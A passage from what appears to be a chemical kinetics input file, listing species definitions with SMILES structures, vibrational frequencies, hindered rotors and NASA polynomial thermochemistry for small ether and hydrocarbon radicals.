CpInf=(386.623,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(C=CCJCO)"""), ) species( label = 'C=CC(C)[CH]O[CH]C(3829)', structure = SMILES('C=CC(C)[CH]O[CH]C'), E0 = (136.009,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3000,3050,390,425,1340,1360,335,370,2950,3100,1380,975,1025,1650,3010,987.5,1337.5,450,1655,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.705444,0.0978297,-9.22448e-05,4.60842e-08,-9.25128e-12,16532.3,33.7292], Tmin=(100,'K'), Tmax=(1201.05,'K')), NASAPolynomial(coeffs=[18.2013,0.0348619,-1.36034e-05,2.43249e-09,-1.65063e-13,11990.7,-60.9484], Tmin=(1201.05,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(136.009,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(CCsJOCs)"""), ) species( label = 'C=CC1C(C)OC1C(2310)', structure = SMILES('C=CC1C(C)OC1C'), E0 = (-96.9159,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.795345,0.0502791,4.76034e-05,-1.02536e-07,4.56333e-11,-11522.1,25.4134], Tmin=(100,'K'), Tmax=(912.959,'K')), NASAPolynomial(coeffs=[17.1677,0.0312619,-7.76378e-06,1.14184e-09,-7.64101e-14,-16708.5,-64.1144], Tmin=(912.959,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-96.9159,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(469.768,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsOsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + ring(Oxetane)"""), ) species( label = 'CHCH3(T)(359)', structure = SMILES('[CH]C'), E0 = (343.893,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,592.414,4000],'cm^-1')), HinderedRotor(inertia=(0.00438699,'amu*angstrom^2'), symmetry=1, barrier=(26.7685,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (28.0532,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.82363,-0.000909515,3.2138e-05,-3.7348e-08,1.3309e-11,41371.4,7.10948], Tmin=(100,'K'), Tmax=(960.812,'K')), NASAPolynomial(coeffs=[4.30487,0.00943069,-3.27559e-06,5.95121e-10,-4.27307e-14,40709.1,1.84202], Tmin=(960.812,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(343.893,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(128.874,'J/(mol*K)'), label="""CHCH3(T)""", comment="""Thermo library: DFT_QCI_thermo"""), ) species( label = 'C=C[CH]C(C)[O](3162)', structure = SMILES('C=C[CH]C(C)[O]'), E0 = (134.505,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,2950,3100,1380,975,1025,1650,3010,987.5,1337.5,450,1655,2750,2800,2850,1350,1500,750,1050,1375,1000,384.942,384.942,384.943],'cm^-1')), HinderedRotor(inertia=(0.253012,'amu*angstrom^2'), symmetry=1, barrier=(26.6048,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.253012,'amu*angstrom^2'), symmetry=1, barrier=(26.6048,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.253012,'amu*angstrom^2'), symmetry=1, barrier=(26.6048,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (84.1164,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.09655,0.0540352,-2.42723e-05,-6.88289e-09,6.2884e-12,16290.2,22.111], Tmin=(100,'K'), Tmax=(1040.9,'K')), NASAPolynomial(coeffs=[13.895,0.0243842,-9.68902e-06,1.80337e-09,-1.27382e-13,12567.8,-45.2296], Tmin=(1040.9,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(134.505,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(320.107,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CC(C)OJ) + radical(C=CCJCO)"""), ) species( label = '[CH]=C[CH2](321)', structure = SMILES('[CH]C=C'), E0 = (376.654,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650,229.711,230.18,230.787],'cm^-1')), HinderedRotor(inertia=(1.33306,'amu*angstrom^2'), symmetry=1, barrier=(50.5153,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (40.0639,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.31912,0.00817959,3.34736e-05,-4.36194e-08,1.58213e-11,45331.5,10.6389], Tmin=(100,'K'), Tmax=(983.754,'K')), NASAPolynomial(coeffs=[5.36755,0.0170743,-6.35108e-06,1.1662e-09,-8.2762e-14,44095,-3.44606], Tmin=(983.754,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(376.654,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(203.705,'J/(mol*K)'), comment="""Thermo library: DFT_QCI_thermo + radical(AllylJ2_triplet)"""), ) species( label = 'C[CH]O[CH]C(3586)', structure = SMILES('C[CH]O[CH]C'), E0 = (87.5391,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3000,3050,390,425,1340,1360,335,370,309.381,309.385,309.388],'cm^-1')), HinderedRotor(inertia=(0.00176209,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.189248,'amu*angstrom^2'), symmetry=1, barrier=(12.8422,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.189124,'amu*angstrom^2'), symmetry=1, barrier=(12.8416,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.188973,'amu*angstrom^2'), symmetry=1, barrier=(12.8424,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (72.1057,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.10245,0.0618091,-6.3831e-05,3.5455e-08,-7.88959e-12,10634.5,19.5849], Tmin=(100,'K'), Tmax=(1091.38,'K')), NASAPolynomial(coeffs=[12.1588,0.0212864,-8.13614e-06,1.43372e-09,-9.63813e-14,8221.2,-34.7223], Tmin=(1091.38,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(87.5391,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCsJOCs) + radical(CCsJOCs)"""), ) species( label = '[CH2][CH]C1C(C)OC1C(3830)', structure = SMILES('[CH2][CH]C1C(C)OC1C'), E0 = (174.021,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.715198,0.0578901,1.44284e-05,-5.97178e-08,2.81082e-11,21061.3,29.5339], Tmin=(100,'K'), Tmax=(925.275,'K')), NASAPolynomial(coeffs=[14.0021,0.0371761,-1.15292e-05,1.88222e-09,-1.2599e-13,17030.4,-42.0314], Tmin=(925.275,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(174.021,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(465.61,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsCsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + ring(Oxetane) + radical(RCCJ) + radical(Cs_S)"""), ) species( label = 'C[C]=CC(C)O[CH]C(3769)', structure = SMILES('C[C]=CC(C)O[CH]C'), E0 = (176.142,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,1685,370,3010,987.5,1337.5,450,1655,2750,2762.5,2775,2787.5,2800,2812.5,2825,2837.5,2850,1350,1380,1410,1440,1470,1500,700,750,800,1000,1050,1100,1350,1375,1400,900,1000,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0315203,0.0892071,-7.73261e-05,3.66213e-08,-7.24809e-12,21329.6,32.7109], Tmin=(100,'K'), Tmax=(1182.63,'K')), NASAPolynomial(coeffs=[13.6727,0.042855,-1.85343e-05,3.47916e-09,-2.41984e-13,18088.2,-35.7025], Tmin=(1182.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(176.142,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(CCsJOCs) + radical(Cds_S)"""), ) species( label = 'C[CH]OC(C)[C]=CC(3767)', structure = SMILES('C[CH]OC(C)[C]=CC'), E0 = (176.142,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,1685,370,3010,987.5,1337.5,450,1655,2750,2762.5,2775,2787.5,2800,2812.5,2825,2837.5,2850,1350,1380,1410,1440,1470,1500,700,750,800,1000,1050,1100,1350,1375,1400,900,1000,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0315203,0.0892071,-7.73261e-05,3.66213e-08,-7.24809e-12,21329.6,32.7109], Tmin=(100,'K'), Tmax=(1182.63,'K')), NASAPolynomial(coeffs=[13.6727,0.042855,-1.85343e-05,3.47916e-09,-2.41984e-13,18088.2,-35.7025], Tmin=(1182.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(176.142,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(CCsJOCs) + radical(Cds_S)"""), ) species( label = '[CH2]C=[C]C(C)OCC(3831)', structure = SMILES('[CH2]C=[C]C(C)OCC'), E0 = (147.185,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,1685,370,1380,1390,370,380,2900,435,3000,3100,440,815,1455,1000,3010,987.5,1337.5,450,1655,2750,2850,1437.5,1250,1305,750,350,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.00793185,0.0829089,-6.04027e-05,2.26745e-08,-3.50278e-12,17850.5,33.4619], Tmin=(100,'K'), Tmax=(1490.7,'K')), NASAPolynomial(coeffs=[16.276,0.0392141,-1.6435e-05,3.01133e-09,-2.05112e-13,12995.6,-51.5996], Tmin=(1490.7,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(147.185,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(Cds_S)"""), ) species( label = 'C[CH]O[C](C)C=CC(3764)', structure = SMILES('C[CH]C=C(C)O[CH]C'), E0 = (49.0705,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.640108,0.0891297,-6.12361e-05,1.18108e-08,2.87524e-12,6080.09,30.4291], Tmin=(100,'K'), Tmax=(1033.24,'K')), NASAPolynomial(coeffs=[20.3276,0.0315903,-1.20135e-05,2.18895e-09,-1.53071e-13,485.628,-77.5184], Tmin=(1033.24,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(49.0705,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsOs) + group(Cds-CdsCsH) + radical(CCsJOC(O)) + radical(Allyl_S)"""), ) species( label = '[CH2]C(C=CC)O[CH]C(2304)', structure = SMILES('[CH2]C(C=CC)O[CH]C'), E0 = (148.81,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,3000,3100,440,815,1455,1000,2995,3025,975,1000,1300,1375,400,500,1630,1680,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(3603.64,'J/mol'), sigma=(6.47245,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=562.88 K, Pc=30.16 bar (from Joback method)"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.366291,0.0974918,-9.62082e-05,5.20847e-08,-1.16087e-11,18053.8,33.1965], Tmin=(100,'K'), Tmax=(1070.7,'K')), NASAPolynomial(coeffs=[14.5818,0.0416478,-1.79736e-05,3.37249e-09,-2.3478e-13,14852.8,-39.9407], Tmin=(1070.7,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(148.81,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(CCsJOCs) + radical(CJC(C)OC)"""), ) species( label = '[CH2][CH]OC(C)C=CC(3770)', structure = SMILES('[CH2][CH]OC(C)C=CC'), E0 = (149.889,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,3000,3100,440,815,1455,1000,2995,3025,975,1000,1300,1375,400,500,1630,1680,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.355725,0.0922259,-8.08084e-05,3.75408e-08,-7.11925e-12,18187.2,34.0329], Tmin=(100,'K'), Tmax=(1250.86,'K')), NASAPolynomial(coeffs=[16.5784,0.0380741,-1.58711e-05,2.93153e-09,-2.02187e-13,13950.7,-51.4551], Tmin=(1250.86,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(149.889,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + radical(CJCO) + radical(CCsJOCs)"""), ) species( label = 'C=COC(C)C=CC(3776)', structure = SMILES('C=COC(C)C=CC'), E0 = (-154.29,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.224767,0.0718746,-7.51271e-07,-5.87491e-08,2.98301e-11,-18385.7,31.1801], Tmin=(100,'K'), Tmax=(962.241,'K')), NASAPolynomial(coeffs=[23.0736,0.0259156,-8.43997e-06,1.54149e-09,-1.14178e-13,-25225.4,-92.5665], Tmin=(962.241,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-154.29,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + group(Cds-CdsOsH) + group(Cds-CdsHH)"""), ) species( label = 'CC1C=CCC(C)O1(2305)', structure = SMILES('CC1C=CCC(C)O1'), E0 = (-198.986,'kJ/mol'), spinMultiplicity = 1, opticalIsomers = 1, molecularWeight = (112.17,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.905611,0.0441047,6.69373e-05,-1.19665e-07,4.97254e-11,-23799.2,23.5039], Tmin=(100,'K'), Tmax=(946.16,'K')), NASAPolynomial(coeffs=[17.9393,0.0323207,-9.86314e-06,1.72557e-09,-1.25577e-13,-29718.4,-71.9773], Tmin=(946.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-198.986,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(473.925,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-CsCsOsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH) + ring(36dihydro2hpyran)"""), ) species( label = 'CH2(T)(33)', structure = SMILES('[CH2]'), E0 = (381.08,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([971.045,2816.03,3444.23],'cm^-1')), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (14.0266,'amu'), collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.71758,0.00127391,2.17347e-06,-3.48858e-09,1.65209e-12,45872.4,1.75298], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.14632,0.00303671,-9.96474e-07,1.50484e-10,-8.57336e-15,46041.3,4.72342], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(381.08,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(T)""", comment="""Thermo library: FFCM1(-)"""), ) species( label = '[CH]=CC(C)O[CH]C(3832)', structure = SMILES('[CH]=CC(C)O[CH]C'), E0 = (221.422,'kJ/mol'), modes = [ HarmonicOscillator(frequencies=([1380,1390,370,380,2900,435,3025,407.5,1350,352.5,3120,650,792.5,1650,3010,987.5,1337.5,450,1655,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1600],'cm^-1')), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False), ], spinMultiplicity = 3, opticalIsomers = 1, molecularWeight = (98.143,'amu'), energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85), thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.112798,0.0779437,-6.72043e-05,2.99661e-08,-5.35848e-12,26777.1,30.3184], Tmin=(100,'K'), Tmax=(1339.63,'K')), NASAPolynomial(coeffs=[16.9371,0.0277067,-1.09518e-05,1.9713e-09,-1.33982e-13,22269.5,-55.7679], Tmin=(1339.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(221.422,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(386.623,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CCsJOCs) + radical(Cds_P)"""), ) species( label = 'N2', structure = 